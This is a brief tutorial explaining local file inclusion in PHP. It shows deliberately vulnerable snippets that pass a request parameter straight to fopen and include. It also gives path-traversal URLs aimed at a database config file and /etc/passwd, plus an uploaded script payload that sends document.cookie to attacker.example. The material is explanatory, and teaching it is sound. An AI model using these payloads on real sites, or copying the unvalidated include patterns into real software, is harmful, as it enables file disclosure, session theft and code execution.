What is local file inclusion?

Local file inclusion (LFI) is a web vulnerability that lets a malicious hacker access, view, and/or include files located in the web server file system within the document root folder.

<?PHP 
    $file = $_GET["file"];
    $handle = fopen($file, 'r');
    $poem = fread($handle, 1);
    fclose($handle);
    echo $poem;
?>

http://victim.example/my_app/display.php?file=poem.txt

http://victim.example/my_app/display.php?file=../config/database.php
http://example.com/my_app/display.php?file=../../../../etc/passwd

LFI that leads to cross-site scripting

The attack vector

The attacker first uses the poem file upload functionality to upload the following “poem” as a text file called poem42.txt:

<script>fetch("http://attacker.example?log="+encodeURIComponent(document.cookie));</script>

Then, the attacker submits a request to include the poem:

http://victim.example/my_app/display.php?file=poem42.txt

LFI that leads to remote code execution

<?PHP 
  $module = $_GET["module"];
  include $module;
?>

http://victim.example/index.php?module=welcome.php
http://victim.example/index.php?module=poems/poem42.txt